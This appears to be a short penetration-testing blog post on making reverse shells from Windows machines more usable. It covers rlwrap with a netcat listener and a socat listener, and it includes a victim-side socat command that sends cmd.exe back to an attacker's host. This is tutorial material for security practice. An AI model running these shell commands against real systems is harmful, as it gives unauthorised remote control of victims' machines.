Upgrading remote shells (Windows machines)
In a previous article I wrote about upgrading limited Linux shells to a fully usable TTY shell. Usually, after catching a reverse shell from a Windows machine through netcat you already have a shell that has full functionality. However, on occasion your shell is limited in some ways that can be truly annoying. The features I miss the most are command history (and using the ‘up’ and ‘down’ arrows to cycle through them) and tab autocompletion. It can feel quite disorienting working in a shell that is missing these vital features.
Options for upgrading Windows reverse shells are more limited than they are coming from a Linux machine.
You can mitigate some of the restrictions of poor netcat shells by wrapping the netcat listener with the rlwrap
command. This is not installed in Kali Linux by default so you will need to install it using the command sudo apt install rlwrap -y
. Other distributions may or may not have this installed or available in their package manager.
rlwrap nc -lvnp $port
Start your netcat listener by first prefixing it with the rlwrap
command, then specifying the port to listen on. Your shell will automatically be a bit more stable than running netcat by itself.
Another powerful tool that can be used to get functional shells, do port forwarding, and much more is socat
. (Windows version: https://github.com/3ndG4me/socat)
- From your attack platform create a listener
socat TCP4-LISTEN:$port,fork STDOUT
Upload to or compile
on the Windows victim machine.On the Windows victim create the reverse shell back to your waiting listener.
socat.exe TCP4:$ip:$port EXEC:'cmd.exe',pipes
Another method of upgrading the functionality of a Windows reverse shell that I know is to create a reverse shell payload that calls a meterpreter
interactive shell. This shell interacts with the Metasploit Framework to provide additional functionality such as uploading and downloading files, attempting to elevate privileges to System, and more.
Other Examples
If you have any other examples of methods of upgrading Windows reverse shells, or have any other fun or useful tips or tricks, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!
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